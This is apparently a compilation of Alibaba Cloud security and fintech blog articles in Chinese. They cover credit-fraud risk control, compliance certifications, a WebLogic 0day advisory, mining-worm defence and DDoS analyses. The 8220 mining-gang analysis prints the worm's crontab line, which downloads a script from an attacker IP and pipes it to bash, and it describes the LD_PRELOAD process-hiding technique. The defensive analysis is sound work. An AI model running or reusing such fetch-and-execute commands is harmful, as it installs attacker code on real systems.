逾期率上升 底层共债风险向上传导

近年来,受宏观经济形势的影响,消费金融行业迫于业绩压力,采用了较为激进的增长战略:通过线上获客、渠道下沉等手段,将信贷服务的提供范围,从信用良好的头部客群,扩展至还款意愿和能力均较差的次级人群。不少金融机构面临着之前从未遇到过的问题:数量庞大、技术手段先进的专业黑灰产大军,大量信用信息几乎为空白的人群,等等。

由于金融机构缺乏相应的风控手段,难以准确评估欺诈和信用风险,无法及时作出正确的决策,逾期和坏账风险形势十分严峻。不仅如此,随着监管部门加大对现金贷行业乱象的整治力度,使得大量原本依靠在多个线上借款平台间腾挪、借新还旧的多头借贷者的资金链开始断裂,引发共债风险爆发,并由底层现金贷平台向银行等传统金融机构逐渐传导。从各大持牌消费金融公司和上市银行披露的2018年年报中不难发现,个人消费信贷逾期率和坏账率攀升、营收和利润增长放缓,已成为行业中“不能说的秘密”。

金融科技如何化解金融业务风险

为了帮助金融机构解决新环境下面临的信贷风险,阿里云推出了一套完整的金融风控解决方案,贯穿于金融信贷业务的全生命周期。该解决方案可以帮助消费金融机构,以金融科技手段,有效化解个人信贷业务中面临的欺诈和信用等风险。

_1

阿里云金融风控解决方案基于阿里系多年业务的实战验证、大量风控专家的行业经验和技术沉淀,真正实现以数据驱动,同时提供功能强大的决策引擎工具,可以帮助用户进行风险的实时分析和决策,并有定制化策略和建模服务,贴合金融机构的业务场景,解决行业痛点。

一、身份冒用、资料伪造等黑灰产欺诈风险:黑灰产人员花数百元从贫困山区、农村收购身份证,然后利用这个身份证办理手机号、银行卡,再使用工具伪造信用卡账单、银行卡流水、消费记录等,甚至“养”手机卡半年以上,在通讯录中存储外卖、快递等人员联系方式,人为制造半年以上的通讯记录,包装出一套完整的信贷申请资料,从而在各个机构尝试进行欺诈和骗贷。

阿里云身份认证和实人认证产品通过实时的人证合一验证可以有效的检测出持证人是否是本人,解决此类问题,确保由本人亲自发起业务申请。

二、缺乏足够的信息来全面评估借款人的逾期风险:阿里云提供的数据服务,覆盖全网14亿多智能终端设备,90%以上的互联网活跃人群、数千维底层风险特征。通过构建机器学习模型,形成互联网行为风险评分,帮助金融机构有效识别欺诈和信用风险。尤其是对于金融机构通过渠道下沉新拓展的三四五六线城市居民、在校学生、蓝领阶层等人行征信报告暂时无法覆盖的人群。传统维度可用信息量极少,阿里云提供的数据服务形成了极为有益的补充。另外,业务风险情报(金融版)已积累数千万事实类逾期风险样本,通用版信用评分模型对于好坏样本区分度的KS值平均可达到30,定制化联合建模则可以达到GINI55、KS45,高于业界平均水平,帮助客户有效提升风控能力。

三、线上业态中面临的其他业务风险:在金融机构业务全面数字化转型,从线下转入线上的过程中,阿里云可以提供运营反欺诈服务,通过阿里云设备指纹技术、风险识别策略和模型,有效识别线上业务中的批量注册风险、营销推广活动中的“薅羊毛风险”和账号盗用等风险,为线上业务的发展保驾护航。

阿里云金融风控解决方案典型应用场景

以消费金融业务场景为例,阿里云金融风控服务贯穿业务全生命周期,在不同的业务环节可以用到的产品和服务如下图所示:

_2

目前,阿里云已经为数十家金融机构提供了风控服务,并为客户持续创造价值。以某小额信贷客户为例,使用阿里云风控服务后,在转化率保持不变的情况下,首期逾期率较之前下降30%。

未来,阿里云将在数据、算法、平台等领域继续发力,打磨产品功能,提升用户体验,并计划将产品应用场景进一步拓宽至保险科技、监管科技等金融科技的前沿领域,为不同类型金融机构的风险管理和运营部门提供易用的风控产品和服务,以金融科技手段化解欺诈和信用风险,助力业务稳健发展。

如果您对上面的阿里云金融风控方案中的产品和服务感兴趣,请拨打95187-1,或您的客户经理。

斩获新资质

数字时代,数据的安全对于互联网用户来说显得尤为重要。阿里云更是一直坚持“安全第一准则”,致力于为客户的数据安全搭建更健全机制。

2019年5月,阿里云“电子政务云平台系统”正式通过网络安全等级保护三级测评。这是等保2.0正式国家标准GB/T 22239-2019 《信息安全技术 网络安全等级保护基本要求》发布后,全国首个通过等保2.0国标测评的云平台。

等保2.0是什么?

2018年6月27日,公安部正式公布《网络安全等级保护条例(征求意见稿)》,标志着《网络安全法》(以下称《网安法》)第二十一条所确立的网络安全等级保护制度有了具体的实施依据和有力抓手。

相较于2007年实施的《信息安全等级保护管理办法》所确立的等级保护1.0体系,《等保条例》在国家支持、定级备案、密码管理等多个方面进行了更新与完善,适应了现阶段网络安全的新形势、新变化以及新技术、新应用发展的需求,标志着等级保护正式迈入2.0时代。

而这,距离上一次斩获殊荣还不到半年。

合规认证全回顾

2018年12月,阿里云获得ISO/IEC 27017和ISO/IEC 27018两项权威认证,这意味着阿里云实现了ISO 9001、ISO/IEC 20000等共7项ISO认证对公共云上139款产品以及对国内外IDC机房的全覆盖。

ISO_

ISO制定的系列管理体系得到全球信赖和广泛认可。通过ISO的标准认证,表明阿里云无论是在自身管理体系建设上,还是保证客户信息安全方面,均符合国际公认的权威标准。

国际权威的认证机构BSI的审核团队表示

经过对阿里云管理体系认证审核和持续监督审核,我们高兴地看到,阿里云管理体系内的各类业务活动、产品和服务能力,包括国内外的场所,均符合ISO相关管理体系标准要求,这说明阿里云在安全性、稳定性、合规性上均达到国际先进标准的要求。

在不断符合ISO体系认证过程中,阿里云一方面严格遵循ISO标准,完善自身管理体系;另一方面夯实产品从规划设计、开发测试到上线运营的全生命周期的规范化技术能力,沉淀了一套完整支撑产品运营的原子化流程,所有产品均遵循整体的流程管控要求,实现安全合规。

回顾发展历程,保障用户数据和隐私安全,始终是阿里云坚守的第一准则。

· 2013年, 阿里云获得全球首张云安全国际认证金牌(CSA-STAR),这是BSI向全球云服务商颁发的首张金牌,也是中国企业在信息化、云计算领域安全合规方面第一次取得世界领先成绩。

· 2015年,阿里云作为亚洲合规资质最全的云服务商,率先发布《数据保护倡议书》,是首个提出“绝对不碰客户数据”承诺的云厂商。

· 2016年,阿里云获得BSI颁发的全球第一张ISO 22301国际认证证书。

· 2016年,阿里云通过了“全球最严”的数据安全审计,从产品、研发、运营、服务机制等217项目的核心控制点,均通过了国际权威审计方安永的验证。

· 2017年,阿里云成为全球第一家同时完成德国C5云安全基础要求和附加要求评审的云服务提供商;并支持美国卡内基梅隆大学共同完成数据移动权利调研报告,希望全球云服务提供商能重视、履行数据安全和隐私保护。

· 2018年,阿里云在全产品、全节点通过ISO认证的同时,拿下云服务用户数据保护能力多项认证。

· 2018年,被业界公认为全区最严的数据保护法规GDPR生效,阿里云从平台、系统、产品、服务、合规、流程、政策等方面,全面按照该要求持续进行数据保护与相关服务改进,目前相关工作已准备就绪。

· 2019年,阿里云专有云平台通过等保2.0四级(可交付的最高等级)测评,并联合公安部信息安全等级保护评估中心发布了《阿里专有云等保合规白皮书》,成为全球首个专有云等保合规白皮书。

安全无止境

除了进行第三方合规认证之外,阿里云在数据安全机制、流程、技术等维度,也已经走在全球前列。目前,阿里云建立了双因素身份认证-增强访问控制-内部审计-第三方审计等“四位一体”的数据安全机制流程,以及基于芯片级的SGX加密技术、用户数据全链路加密方案,保护用户在云上的数据安全。同时,阿里云在产品规划当中遵从默认隐私设计(Privacy by Design)理念,将安全融入到系统和产品设计中。所有新发布的云产品上线之前,须通过安全+隐私设计双重评估,确保证其合规性。

在护航云上企业免于外部攻击方面,阿里云基于护航阿里巴巴经济体十余年沉淀的安全能力,凭借自身的大数据处理和分析能力,将深度学习、人工智能、IPv6等前沿技术融入安全产品中,为云上企业建立了基础安全、数据安全、业务安全等一系列保障安全产品和解决方案,让外部攻击无所遁形,为客户专注于发展自身业务创造有利条件。

未来,阿里云将继续致力于携手客户、生态伙伴,倡导与实践数据安全和隐私保护,共同保障云上百万企业安全。

6月11日,阿里云安全团队发现WebLogic CVE-2019-2725补丁绕过的0day漏洞,并第一时间上报Oracle官方, 6月12日获得Oracle官方确认。由于Oracle尚未发布官方补丁,漏洞细节和真实PoC也未公开,为保障客户的安全性,阿里云Web应用防火墙(WAF)紧急更新规则,已实现对该漏洞的默认防御。

一、漏洞简介

WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,被广泛应用于保险、证券、银行等金融领域。

此次发现的WebLogic CVE-2019-2725补丁绕过的0day漏洞曾经因为使用HTTP协议,而非T3协议,被黑客利用进行大规模的挖矿等行为。WebLogic 10.X和WebLogic 12.1.3两个版本均受到影响。

鉴于该漏洞的高危严重性,阿里云提醒云上客户高度关注自身业务是否使用WebLogic,是否开放了/_async/ 及 /wls-wsat/的访问路径。另外由于公安部护网期间,请护网客户重点关注。

二、WebLogic Server漏洞发现

阿里云安全团队使用Oracle官方JDK8u211版本,并打了其在4月份提供的CVE-2019-2725的补丁,进行测试,发现了该漏洞的存在。由于WebLogic Server的广泛应用,可见该漏洞影响之大。

_

漏洞攻击演示

该漏洞利用JDK1.7及以上版本的JDK特性绕过了CVE-2019-2725补丁里对XMLDecoder标签的限制,以下是CVE-2019-2725的补丁针对class标签的过滤。

_

三、安全建议

由于Oracle官方暂未发布补丁,阿里云安全团队给出如下解决方案:

1.请使用WebLogic Server构建网站的信息系统运营者进行自查,发现存在漏洞后,立即删除受影响的两个war包,并重启WebLogic服务;
2.因为受影响的两个war包覆盖的路由较多,如下图所示,所以建议通过策略禁止 /_async/ 及 /wls-wsat/ 路径的URL访问;

_1

wls-wsat.war的路由

_2

bea_wls9_async_response.war的路由

近日,阿里云安全团队发现8220挖矿团伙为了更持久的驻留主机以获得最大收益,开始使用rootkit技术来进行自我隐藏。这类隐藏技术的使用在watchdogs等挖矿蠕虫使用后开始出现逐渐扩散和进化的趋势,此后预计主机侧的隐藏和对抗将成为主流。

背景

阿里云安全团队蠕虫监控平台发现8220挖矿团伙的下载脚本出现更新,除了下载必要的驻留脚本、挖矿程序之外,新增加了一个so文件的下载地址:hxxp://107.174.47.156/1.so。

8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署挖矿程序的国内团伙[1-2],该团伙组合利用WebLogic XMLDecoder 反序列化漏洞(CVE-2017-10271)、Drupal RCE(CVE-2018-7600)、JBoss 反序列化命令执行漏洞(CVE-2017-12149)等多个漏洞进行攻击并部署挖矿程序进行牟利。

通过对相关脚本和该so的简单分析,我们确认8220团伙已经在其攻击工具包使用ProcessHider[3]对自身进行隐藏。ProcessHider是被众多恶意软件广泛利用的rootkit。挖矿蠕虫利用该工具使管理员难以通过常规手段检测到挖矿进程,从而提高挖矿进程的存活时间以最大化挖矿收益。随着时间的推移,可能会有越来越多的挖矿蠕虫加入rootkit功能。

蠕虫检测

如果在云控制台看到明显的CPU 上升,机器整体性能卡顿,但是登录机器使用 PS/TOP 等命令却无法定位到具体占用CPU的进程,此时该机器就很可能已经感染此类使用 rootkit 进行隐藏的挖矿蠕虫。

1.主机检测

该蠕虫利用LD_PRELOAD机制,使得自身的so文件先于系统加载,并通过劫持 readdir函数,使依赖该 API 返回的PS/TOP等系统命令无法正确返回结果 。 因此用户使用这些受影响的系统命令将无法看到真实的进程。

如上图所示,该蠕虫隐藏的进程关键字是kworkerds。

在主机侧可以使用以下命令对蠕虫进行检测

查看动态链接库
#ldd /bin/top|grep usr
  /usr/local/lib/libkk.so (0x00007f0f94026000)
发现存在异常的so文件

查看 PRE_LOAD系统变量
#cat /etc/ld.so.preload 
  /usr/local/lib/libkk.so
发现preload文件被修改

查看 crontab
#crontab -l
  */30 * * * *  (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh发现crontab出现奇怪的定时任务

使用普通top 查看到的进程:

_

LD_PRELOAD依赖于动态链接过程,因此使用静态编译的busybox执行top命令,将可以看到真实的全部进程。

_

2.网络检测

随着对抗的不断升级,挖矿蠕虫的自我隐藏功能必将不断升级,而面对全副武装的蠕虫病毒,普通用户在主机侧与其进行强对抗成本极高并且收益较低。针对该类蠕虫通过网络侧的NTA(Network Traffic Analysis)功能进行检测更加有效。因为无论攻击者在主机侧采用了何种隐藏手法,但其远程下载、C&C通信、矿池通信等行为均会在网络流量中留下痕迹。

下图是在网络侧云防火墙通过检测到主机感染后下载后门文件的行为发现该蠕虫的记录。

_

修复方案

1.由于本地命令可能都已被劫持,因此首先下载静态编译的busybox来执行指令,保证执行的系统命令不受劫持影响。

下载二进制
#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox赋予执行权限
#chmod +x busybox

2.清理动态劫持

./busybox rm -f  /usr/local/lib/libkk.so 2>/dev/null./busybox chattr -i /etc/ld.so.preload 2>/dev/null./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null./busybox rm -f /etc/ld.so.preload
./busybox touch /etc/ld.so.preload
./busybox chattr +i /etc/ld.so.preload
ldconfig

3.杀恶意进程和相关文件

./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep 'kworkerds' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep '107.174.47.156' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null./busybox rm -f /var/tmp/kworkerds
./busybox rm -f /var/tmp/sustse*

4.修复 crontab

./busybox chattr -i  /etc/cron.d/root  2>/dev/null./busybox rm -f /etc/cron.d/root
./busybox chattr -i /etc/cron.d/apache  2>/dev/null./busybox rm -f /var/spool/cron/apache
./busybox chattr -i /var/spool/cron/root  2>/dev/null./busybox rm -f /var/spool/cron/root
./busybox chattr -i /var/spool/cron/crontabs/root  2>/dev/null./busybox rm -f /var/spool/cron/crontabs/root
./busybox rm -rf /var/spool/cron/crontabs
./busybox touch /var/spool/cron/root
./busybox chattr +i /var/spool/cron/root

5.再次修复下 crontab,回到第3步再次执行

6..修复完成和重启crontab

service crond start

REF:

1.疑似国内来源的“8220挖矿团伙”追踪溯源分析 [https://www.freebuf.com/column/179970.html]

2.“8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 [https://www.freebuf.com/column/186467.html]

3.https://github.com/gianlucaborello/libprocesshider

5月16日,阿里云“电子政务云平台系统”正式通过网络安全等级保护三级测评。这是等保2.0正式国家标准GB/T 22239-2019 《信息安全技术 网络安全等级保护基本要求》发布后全国首个通过等保2.0国标测评的云平台。2016年阿里云成为全国首家等保2.0试点示范单位,是全国首个符合国家等级保护制度的云企业,并紧密跟踪等保2.0标准编制过程中的变化,每年依据等保2.0《基本要求》编制过程中的最新稿开展等级测评并顺利通过。

阿里云是等保2.0国标的深度参与单位,曾牵头负责云扩展部分的设计要求。与等保1.0相比,等保2.0在标准上更强调“一个中心,三重防护”的安全技术设计框架,一个中心指的是安全管理中心,三重防护分别是计算环境安全、区域边界安全和通信网络安全。阿里云的安全防护也都遵循了该安全技术框架的设计,采用统一的认证、权限管理、审计管理、安全管理中心进行云平台的内控和安全管理,并由专业的安全运营团队开展运营,保护平台的基座稳固。

遵循“三重防护”的要求,在计算环境安全方面,阿里云自研的“飞天分布式操作系统”承载了云上各类应用,从设计之初就严格遵守多租户隔离、严格的权限管控、数据的容灾备份等云产品的默认安全功能,可谓“安全源于设计”;在通信网络安全和区域边界安全方面,阿里云VPC、安全组和云防火墙为云平台和云客户的网络边界防护和隔离提供了安全保障。

遵循“一个安全管理中心”的要求,阿里云率先推出了亚洲第一个云安全中心,通过一个平台集中式安全管理,实现了云上资产全面安全预防、威胁检测、调查响应、主动防御为一体的自动化安全闭环,让云上客户的安全运营人员从海量告警分析中解放出来,帮助云上欠缺专业安全运营人员的客户自动化解决安全问题,让这种高等级的安全运营能力成为所有企业的基础设施能力之一,实现全方位默认安全防护。

等保2.0除了制度上升到法律层面,还加强了保护力度和明确罚则,等级保护对象扩展到云计算、大数据等新的技术领域,意味着云平台自身首先必须要按照最新的等保要求开展合规工作,云上的用户也要遵守国家法律的要求,选择合规的云平台,并对云上系统开展等保工作。

阿里云在全国范围内推出了云上等保合规解决方案,让阿里云上用户实现平台业务默认合规的同时,帮助客户快速开展等保的安全建设和整改,共同构筑健康的网络安全环境。

根据阿里云安全团队发布的《2018年云上挖矿分析报告》显示,过去一年中,每一波热门0 Day的出现都伴随着挖矿蠕虫的爆发性传播,挖矿蠕虫可能因为占用系统资源导致业务中断,甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等)给企业带来资金与数据的损失。

如何提升企业的安全水位,抵御挖矿蠕虫的威胁成为每个企业都在思考的问题。本文以云上环境为例,从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来阐述阿里云云防火墙如何全方位抵御挖矿蠕虫。

1.挖矿蠕虫的防御

1.1 挖矿蠕虫的传播方式

据阿里云安全团队观察,云上挖矿蠕虫主要利用网络上普遍存在的通用漏洞和热门的0 Day/N Day漏洞进行传播。

1.1.1 通用漏洞利用

过去一年挖矿蠕虫普遍会利用网络应用上广泛存在的通用漏洞(如配置错误、弱密码等)对互联网持续扫描和攻击,以对主机进行感染。下表是近期活跃的挖矿蠕虫广泛利用的通用漏洞:

1.1.2  0 Day/N Day漏洞利用

0 Day/N Day在网络上未被修复的窗口期也会被挖矿蠕虫利用,迅速进行大规模的感染。下表是近期活跃的挖矿蠕虫利用过的热门0 Day/N Day漏洞:

1.2 挖矿蠕虫的防御

针对这两类利用方式,阿里云云防火墙作为业界首款公共云环境下的SaaS化防火墙,应用可以透明接入,可以对云上进出网络的恶意流量进行实时检测与阻断,在防御挖矿蠕虫方面有着独特优势。

1.2.1 通用漏洞的防御

针对挖矿蠕虫对SSH/RDP等进行暴力破解的攻击方式,云防火墙的基础防御支持常规的暴力破解检测方式,如登录或试错频次阈值计算,对超过试错阈值的行为进行IP限制,还支持在用户的访问习惯、访问频率基线的基础上,结合行为模型在保证用户正常访问不被拦截的同时对异常登陆进行限制。

针对一些通用的漏洞利用方式(如利用Redis写Crontab执行命令、数据库UDF进行命令执行等),云防火墙的基础防御基于阿里云的大数据优势,利用阿里云安全在云上攻防对抗中积累的大量恶意攻击样本,可以形成精准的防御规则,具有极高的准确性。

若您需要开启云防火墙的基础防御,只需要在安全策略->入侵防御->基础防御配置栏勾选基础规则即可,当基础防御开启后,在网络流量分析->IPS阻断分析中可以看到详细的拦截日志,相关参考如下:

1.2.2 0 Day/N Day漏洞防御

由于热门0 Day/N Day漏洞修复不及时,被挖矿蠕虫利用感染的风险较大。云防火墙通过结合全网部署的蜜罐分析异常攻击流量和阿里云先知平台漏洞情报的共享,可以及时发现针对0 Day/N Day的漏洞利用,第一时间获取漏洞poc/exp,并落地形成虚拟补丁,在与黑客的攻防对抗中占得时间先机。

用户可以在【安全策略->入侵防御->虚拟补丁】配置栏中可以开启当前热门挖矿蠕虫所利用的高危漏洞,下图是近期活跃的挖矿蠕虫各自利用过的0 Day/N Day漏洞对应的虚拟补丁。

2. 挖矿蠕虫的检测

在与蠕虫攻防对抗中,即使在公网边界做好入侵防御措施仍有可能感染挖矿蠕虫。比如挖矿蠕虫可以通过VPN直接由开发机传播到生产网,也有由于运维使用的系统镜像、Docker镜像就已经被植入挖矿病毒,从而导致大规模感染的爆发。

因此,针对挖矿蠕虫的即时感知至关重要。云防火墙通过NTA(Network Traffic Analysis)能力提供的入侵检测功能,能够有效发现挖矿蠕虫感染事件。

利用云上强大的威胁情报网,云防火墙可以及时发现常见货币的矿池地址、检测挖矿木马的下载行为和常见的矿池通信协议,实时识别主机的挖矿行为,并及时告警。

用户可以通过【网络流量分析->入侵检测】中看到每次攻击事件的摘要、影响资产、事件详情等类目信息,用户只需在一键防御类目中打开拦截模式,一键提交,即可在网络端阻断挖矿木马与矿池的通信。

依据详情提供的外联地址信息,用户可以在主机端查找到相应的进程快速清理二进制程序。

3.入侵后如何快速止血?

若服务器已感染挖矿蠕虫,云防火墙可以从恶意文件下载阻断、中控通信拦截、重点业务区强访问控制三方面控制蠕虫进一步传播,减少业务和数据的进一步损失。

3.1 恶意文件下载阻断

恶意文件下载防御是基础防御中重要功能之一,服务器在感染挖矿蠕虫后通常会进行恶意文件下载,基础防御集成恶意文件检测能力,对下载至服务器的文件在流量中进行安全检测,在检测到尝试下载恶意文件时进行告警并阻断。

云防火墙基础防御能力会实时更新常见挖矿蠕虫的各类恶意文件的唯一性特征码和文件模糊hash,在挖矿蠕虫入侵成功/进一步下载更新新的攻击载荷时,会对下载至服务器的文件在流量中进行文件还原及特征匹配,对检测到尝试下载恶意文件时进行告警并阻断。

3.2 中控通信拦截

在感染挖矿蠕虫后,针对挖矿蠕虫可能和C&C控制端进行通信,接收进一步的恶意行为指令或者向外泄漏敏感数据等,云防火墙的基础防御功能进行实时拦截主要通过以下三方面来实现:

· 通过分析和监控全网蠕虫数据和中控服务器通讯流量,可以对异常通讯流量特征化,落地形成中控通信检测特征,通过实时监控中控通信变化,不断的提取攻击特征,确保及时检测到攻击行为;

· 通过自动学习历史流量访问信息,建立异常流量检测模型,挖掘潜在的未知挖矿蠕虫信息;

· 利用大数据可视化技术对全网IP访问行为关系进行画像,利用机器学习发现异常IP及访问域,并联动全网攻击数据,最终落地形成中控威胁情报库,从而可以对服务器流量通信进行情报匹配,实时阻断恶意的中控连接通信。

下图是通过基础防御和威胁情报对中控通信拦截的记录:

3.3 重点业务区强访问控制

由于业务本身需要,重点业务通常需要将服务或端口对全公网开放,而来自互联网的扫描、攻击却无时不刻窥探企业的资产,对外部的访问控制很难做到细粒度管控。而对某一台ECS、某一个EIP或内部网络主动外联场景下,域名或IP数量其实都是可控的,因为该类外联通常都是进行合法的外联访问,例如DNS、NTP服务等,少量企业自身业务需要也通常只是少许特定IP或域名,故通过对内对外的域名或IP进行管控,可以很好的防止ECS主机被入侵之后,从恶意域名下拉挖矿木马或木马与C&C进行通信等行为。

云防火墙支持访问控制功能,支持域名(含泛域名)和IP配置。针对重点业务的安全问题,可以通过配置一个强粒度的内对外访问控制,即重要业务端口只允许特定域名或者特定的IP进行访问,其他一律禁止。通过以上操作可以很有效的杜绝挖矿蠕虫下载、对外传播,防止入侵后阶段的维持与获利。

例如以下场景中,内网对外访问的总IP数为6个,其中NTP全部标识为阿里云产品,而DNS为我们所熟知的8.8.8.8,通过云防火墙的安全建议,我们可以将上述6个IP进行放行,而对其他IP访问进行全部拒绝。通过如上的配置,在不影响正常业务访问的情况下,防止其他如上提及到的恶意下载、C&C通信的对外连接行为。

结语

由于互联网上持续存在的通用应用漏洞、0 Day漏洞的频发、以及挖矿变现的高效率,挖矿蠕虫大规模蔓延。云上客户可以通过透明接入云防火墙,保护自身应用不受互联网上各种恶意攻击的威胁。同时云防火墙可以伴随客户业务水平弹性扩容,让客户更多的关注业务的扩展,不需要花费更多精力投入在安全上。

更重要的是,云防火墙依托云上海量的计算能力,能够更快的感知最新的攻击威胁、并且联动全网的威胁情报给用户最佳的安全防护,使用户免于挖矿蠕虫威胁。

近日,阿里云数据中心骨干网IPv6 DDoS网络安全防御被工业和信息化部认定为“网络安全技术应用试点示范项目”,本次评选由工业和信息部网络安全管理局发起,从实用性、创新性、先进性、可推广性等维度展开,阿里云成为唯一一家入选IPv6 DDoS防护类项目的云服务商。

响应国家号召,率先布局IPv6

2019年,工信部签发《工业和信息化部关于开展2019年IPv6网络就绪专项行动的通知》,从网络基础设置、应用基础设施、终端设施设备,到网站和应用生态,提出了明确的指标化任务,并对网络的服务性能和安全性明确了目标要求。从软件服务商到终端设备制造商,所有业务都要过渡到IPv6,显然,普及IPv6已成为国家战略。

2018年,阿里云就已建成国内首家IPv6 DDoS云防御系统,支持秒级监控防御海量IP,并在护航全球最大在线购物狂欢节双十一过程中进行了大规模实战。期间,IPv4和IPv6双栈防御系统为云上客户和阿里电商业务拦截5000多次DDoS攻击,成功保障双十一的顺利进行,验证了阿里云DDoS高防IP优秀的防御效果、成熟性和稳定性。

_

阿里云IPv6 DDoS高防IP发展节点

在越来越多的企业过渡到IPv6协议的同时,安全问题也开始凸显。2018年初,IPv6 DDoS攻击已经开始在互联网出现。而很多服务提供者还没有做好将安全防护升级到IPv6的准备。2019年,应对好IPv6浪潮带来的安全挑战,将变得尤为重要。

_

对于互联网服务提供者来说,重构、升级系统来支持IPv6协议下的安全防护涉及到基础设施建设、安全架构和体系的整体改变,成本较高,利用云服务快速搭建基于IPv6的防护体系更具有可行性。目前,阿里云已经以产品化的形式提供IPv6防护能力,助力企业做好新时代下的安全防护。

_

IPv6 DDoS防御最佳实践

对于互联网服务提供者,业务过渡到IPv6一般需要考虑3个问题:

首先,保障现有的IPv4业务稳定运行,水平扩展IPv6服务,逐步将流量调度到IPv6。
其次,需要快速搭建出一个IPv6服务架构,快速具备可以对外服务、满足政策要求、安全合规的IPv6服务。这其中需要考虑投资产出比,以合理成本、人力投入的情况下部署IPv6服务,并尽量不依赖后端大规模改造。
再次,做好服务和安全的可扩展和可演进性,以达到IPv4同样的能力和规模,并可持续迭代。

使用阿里云安全产品搭建IPv6服务可以遵循以下最佳实践:

1.改造云下IPv4业务或改造前端接入网络场景

· 域名解析层:使用云解析DNS 进行IPv4/IPv6网站域名解析;

· 边缘接入和加速层:使用IPv4/IPv6双栈的CDN 对网页静态内容进行浏览加速;

· 网络入口安全层:使用IPv4/IPv6的DDoS防护包+IPv4/IPv6的WAF进行安全防御;

· IPv6<->IPv4转换层:NAT 64服务转换或使用WAF 以IPv4方式回源;

· 后端网络:原有IPv4网络和服务或云下IPv4数据中心;

_

2.云上全链路IPv6场景

· 域名解析层:使用云解析DNS 进行IPv4/IPv6网站域名解析;

· 边缘接入和加速层:使用IPv4/IPv6双栈的CDN 对网页静态内容进行浏览加速;

· 网络入口安全层:使用IPv4/IPv6的DDoS防护包+IPv4/IPv6的WAF进行安全防御;

· 负载均衡层:使用IPv4/IPv6 SLB做负载分摊;

· 后端服务:使用IPv4/IPv6 服务器、存储、缓存、数据库搭建后端服务;

1

2019年,阿里云将在新加坡、印度、美国等海外国家及地区上线IPv6产品,进行安全防护,助力企业IPv6业务的全球化。未来,阿里云将持续运用创新技术驱动更高等级的安全产品,为百万企业提供服务,解决多样化的安全问题,实现普惠安全。

近期,阿里云安全团队观察到数十起大规模的应用层资源耗尽式DDoS攻击(应用层CC攻击),这类攻击存在一些共同的特征,阿里云安全团队对此做了跟踪分析。

几经溯源发现,这些攻击事件源于大量用户在手机上安装了某些伪装成正常应用的恶意APP,该APP在动态接收到攻击指令后便对目标网站发起攻击。根据监测数据显示,近两个月,已经有五十余万台移动设备被用来当做黑客的攻击工具,达到PC肉鸡单次攻击源规模。不难看出,伪装成正常应用的恶意APP已让海量移动设备成为新一代肉鸡,黑灰产在攻击手法上有进一步升级趋势。

海量移动肉鸡下的DDoS攻击有哪些新特征?

通过监测到的数据发现,这类攻击有以下几个特点:

- 移动端设备系统分布均匀:iOS系统约占四成,Android系统六成;

- 攻击规模和肉鸡数量庞大且源IP不固定:单次攻击峰值达百万QPS(每秒请求次数),来源于50多万个肉鸡源IP,且多次攻击事件之间源IP重合度非常低;

- 攻击源IP分布极散:攻击源IP分散于全球160余个国家,近40个运营商,仅中国就有300余个城市存在攻击源,且多数分布在东部及沿海网络发达的省份;

攻击源分布地图攻击源分布地图

- 攻击源IP多为基站IP:近一半的攻击源IP为移动网络大型基站出口,意味着同一个源IP同时承载了攻击流量和大量正常用户流量;

- 攻击调度无规律:由于手机连接的网络变化,以及APP的启动和退出,我们观测到不断有新的攻击源IP加入,超过一半的攻击源并非在攻击开始时就发起攻击,且每个攻击源IP攻击持续时间长短不一,单个攻击源IP请求频率并不高。

某次攻击不同攻击持续时长的IP量及请求量某次攻击不同攻击持续时长的IP量及请求量

限速和黑名单在PC肉鸡时代曾是“一键止血”的防御方式。但以伪装成正常应用的恶意APP方式发起的攻击,由于移动设备远活跃于PC设备,哪怕是一个小众的APP,数量都相当庞大。即使单台肉鸡设备请求频率很低,聚合起来的总请求量也足以压垮目标网站,因此,攻击者可以轻易在不触发限速防御策略的情况下实现攻击。

更可怕的是,由于攻击源多为大型出口IP,传统的防御方法简单粗暴的将攻击IP拉黑,这些IP背后的大量正常用户也将无法访问。同时,新的肉鸡会在攻击过程中不断加入,黑名单的方式在这种情况下也不见得能有效封住攻击。曾经强大的护城河,在新攻击态势下变得鸡肋。

黑客是如何借助恶意APP进行攻击的?

1.黑灰产在APP内嵌了一个WebView,启动后会请求中控链接,该链接指向的页面内嵌及加载了三个JS文件,JS以ajax异步请求的方式动态获得了JSON指令;

2.在非攻击时间段,获得的JSON指令内容为“{“message”: “无数据”, “code”: 404}”,由于不包含攻击指令,JS加载后进入不断循环,定期重新读取JSON指令;

JSON指令决定循环OR执行攻击JSON指令决定循环OR执行攻击

3.一旦攻击者发布攻击JSON指令,JS即退出循环,在处理解析后会将消息传递回WebView。JSON指令中指定了目标URL、请求方式、header等攻击需发送的包内容,并指定了攻击频率、当前设备开始攻击的条件、攻击结束时间等调度参数来增加攻击复杂度和灵活性;

4.WebView通过UserAgent得到设备信息,判断是iOS还是Android系统,不同设备调用不同函数触发加载恶意APP中的Java代码,让设备根据指令发动攻击。

判断设备类型:同时支持安卓及iOS

判断设备类型:同时支持安卓及iOS

通过上述手法,所有安装了这个APP的用户就已经被黑灰产团伙利用,作为攻击肉鸡,神不知鬼不觉地陆续对指定的目标业务发起了无数次的DDoS攻击!

同时这也揭露了一个灰色产业,此类应用的所有者通过发布APP,在各个渠道发布诱导类的广告吸引用户安装使用,之后在通过用户使用APP赚取利润的同时,又将所有安装APP的用户设备作为攻击肉鸡提供给黑灰产来进行DDoS攻击,进行二次获利。

更危险的是,从攻击流程看,攻击者想让这些移动设备以怎样的方式、对谁、做什么操作,全都可以通过JSON指令动态下发,可以说黑灰产能利用用户设备为所欲为。

攻击流程图 攻击流程图

